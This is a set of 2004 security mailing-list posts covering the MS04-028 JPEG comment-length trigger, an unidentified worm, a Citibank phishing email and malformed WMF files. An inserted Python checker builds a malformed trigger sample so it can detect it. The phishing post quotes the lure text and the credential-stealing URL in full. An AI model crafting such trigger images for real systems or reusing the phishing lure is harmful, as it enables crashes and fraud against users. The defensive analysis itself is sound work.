the bulletin MS04-028. http://www.microsoft.com/technet/security/bulletin/ms04-028.mspx
Look at the FFFE0001 or FFFE signature in the JFIF header.
Tested on Windows XP Prof SP1 [gdiplus.dll ver 5.1.3097.0]
[eflorio]


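The two MS04-028 posts above describe the trigger as a COM segment (marker FF FE) whose length field is 0000 or 0001, and the earlier sco.com post (2004-11-29) compares JFIF headers by their APP-segment identifiers ("JFIF", "Ducky", "Adobe"). The following Python is an added example, not code from any of the posts: it walks the marker segments of a JPEG header and reports both things a defender would check on an incoming image, an impossible length field (below the 2 bytes the field itself occupies) and the identifier string of every APPn segment. PAGE_HEADER reproduces the first 55 bytes dumped for the second sco.com image; the SOS marker appended to it and the SAFE/MALFORMED variants are constructed.

```python
import struct

# First 55 bytes of the second image's header as dumped in the sco.com post
# (JFIF APP0, "Ducky" APP12, "Adobe" APP14), followed by a constructed SOS
# marker so the walk stops there instead of needing the rest of the file.
PAGE_HEADER = bytes.fromhex(
    "FFD8FFE000104A46494600010200006400640000"
    "FFEC00114475636B79000100040000003C0000"
    "FFEE000E41646F62650064C000000001"
) + bytes.fromhex("FFDA")

# Constructed variants: a well-formed comment segment (length 5 = the two
# length bytes plus "abc") and the FF FE 00 01 comment length the MS04-028
# posts describe as the crash trigger.
SAFE = PAGE_HEADER[:-2] + bytes.fromhex("FFFE0005") + b"abc" + bytes.fromhex("FFDA")
MALFORMED = PAGE_HEADER[:-2] + bytes.fromhex("FFFE0001") + bytes.fromhex("FFDA")


def walk_segments(data):
    """Yield (offset, marker, declared_length, payload) per marker segment.

    Stops at SOS (FFDA), where entropy-coded data starts, or at EOI (FFD9).
    A declared length below 2 is impossible (the field counts its own two
    bytes); it is yielded with an empty payload and the walk ends, because
    later offsets cannot be trusted after it.
    """
    if data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):
            yield (pos, marker, 0, b"")
            return
        if pos + 4 > len(data):
            raise ValueError(f"truncated segment header at offset {pos}")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:
            yield (pos, marker, length, b"")
            return
        yield (pos, marker, length, data[pos + 4:pos + 2 + length])
        pos += 2 + length
    # Header-only input with no SOS/EOI: report what was parsed so far.


def check_jpeg(data):
    """Return findings for a JPEG header.

    ("malformed_length", offset, marker, length) for a segment whose length
    field is below 2, and ("app_id", offset, marker, identifier) for every
    APPn segment, so the "Ducky"/"Adobe" identifiers compared in the sco.com
    post are visible alongside any bad length.
    """
    findings = []
    for off, marker, length, payload in walk_segments(data):
        if marker in (0xD9, 0xDA):
            continue
        if length < 2:
            findings.append(("malformed_length", off, marker, length))
        elif 0xE0 <= marker <= 0xEF:
            ident = payload.split(b"\x00", 1)[0].decode("ascii", "replace")
            findings.append(("app_id", off, marker, ident))
    return findings


def is_suspicious(data):
    """True when any segment declares an impossible length (below 2)."""
    return any(f[0] == "malformed_length" for f in check_jpeg(data))


if __name__ == "__main__":
    for name, blob in (("page header", PAGE_HEADER), ("safe", SAFE), ("malformed", MALFORMED)):
        print(name, is_suspicious(blob), check_jpeg(blob))
```

The identifiers alone prove nothing: "Ducky" and "Adobe" are ordinary APP12/APP14 segments that Adobe tools write, which is why the check reports them as context rather than as a verdict; only the length field below 2 is flagged.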


Re: [Full-Disclosure] New Win32 Worm regsvc32.exe offers rootkit features

2004-03-30 Thread Elia Florio
Hi list,
my Symantec AV Corporate Edition v 8.00.9374
with Scan Engine 4.1.0.15 and the latest updates (28/3/2004 rev.50)
does not find any worm or virus in your file (regsvc32.exe).
Maybe a new worm or a modified old worm.

The file tries to impersonate the real "\WINDOWS\SYSTEM32\regsvr32.exe"
with a fake name, but is instead a worm compressed with ASPack 2.12.
If you look at the import table, the worm seems to use
"NetShareEnum", "ShellExecuteA" and the winsock API from Windows.

I think it's not a full rootkit as you say, but maybe it contains some stealth
code because it imports "EnumProcessModules" from psapi.dll, used to list
the Windows process list.

EF

- Original Message - 
From: "Markus Koetter" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, March 30, 2004 6:29 PM
Subject: [Full-Disclosure] New Win32 Worm regsvc32.exe offers rootkit
features


> Hi,
> my girlfriend got a new? worm on her win2k desktop.
> The worm is quite aggressive in spreading, netstat -a did not find an
> end, i expect it to be a phatbot/agobot4 fork
> seems like it invaded on port 1025, i dont know which services were
> offerd there, but i saw several connections to port 1025.
>
> the virus offers rootkit capabilities, file and process hide, kills
> firewalls with specific names, and makes the system unusable after some
> uptime.
>
> i installed another firewall renamed the bin to "horst.exe" and got
> several connections to
> c:\winnt\services32\regsvc32.exe
> the file did not exists, neither the process in win2ks taskmanager.
>
> I was not able to remove the virus, so i plugged the machine of the net
> and told her to work offline.
> this worked well for ~4h, then the system became unstable and the floppy
> disk was screaming like a burning pig.
>
> I took my new knoppix cd 3.4, booted it, and used the live f-prot
> install to scan the system for viruses, the system got the latest
> definitions via web, and scanned ...
> No viruses were found.
>
> I mounted the hda1 windows partition and send me the "expected to be the
> virus file" on my own computer running linux
> the file is called regscv32.exe and has the
> md5sum 26a5dbd9add4b16b561cd916675c4439
>
> i expect it to be polymorph
>
> i lack solid skills in disassembler, but i would send this binary to
> fill-disc listed ppl asking for it.
>
> if i fail in my expectations, and this is a standard win32 binary, tell
> me (i cant check the md5sum myself, i lack a win32 system), and i will
> try to find the right binary again.
>
> my own conclusion,
> i will install debian unstable on her desktop for working, and win2k for
> printing on her linux incompatible lexmark printer.
> lilo offering 2 entries "write" "print"
>
> im sick off this ...
>
> Markus Koetter
>
> please mail me for the binary, im really intrested in a analysis report.



[Full-Disclosure] Another false Citibank e-mail...a new phishing?

2004-03-20 Thread Elia Florio
I received this badly-spoofed Citibank e-mail,
which points to a PHP page which asks
for a credit card number... and steals it!!!
Is it the next phishing e-mail?

The link points to http://218.36.71.193:443/citi/

It does not use the "%01" exploit to show a spoofed URL in the Explorer bar.

EF

--- Begin Message ---
Title: Citibank

Citibank Notification
Dear citibank customer,
At Citibank, we value the trust you have placed in us by using our service to conduct your transactions. Because our relationship with you is financial in nature, the protection of your privacy is particularly important to us.

We are sending this verification notice to provide you with information about how Citibank safeguards your privacy, as well as to comply with U.S. federal privacy guidelines that apply to financial institutions such as Citibank. The full terms of Citibank's privacy policy are available on the Citibank website, which you are welcome to review at any time.

Please verify your account information by clicking on the link below:

Verify your accounts here

--- End Message ---


Re: [Full-Disclosure] Windows XP explorer.exe heap overflow

2004-02-25 Thread Elia Florio
> WinXP SP1 (fully patched) german is vuln to AN00010_.wmf
> explorer.exe hogs 100% cpu speed.
> tom

I can confirm that my WinXP SP1 (ITALIAN), fully patched
except for these two updates:

KB832894 - MS04-004 (%01 vuln in URL string)
KB828028 - MS04-007 (ASN.1 library bug)

is vulnerable to malformed EMF and WMF files.

EXPLORER.EXE goes to 99% CPU usage during preview/rendering of malformed
images.

I've tried attaching a .WMF to a mail message and Outlook Express
is vulnerable too; when the user receives the email message, OE tries to display a
preview of the images and hangs. Killing OE does not cause any problem to EXPLORER.EXE.

EF
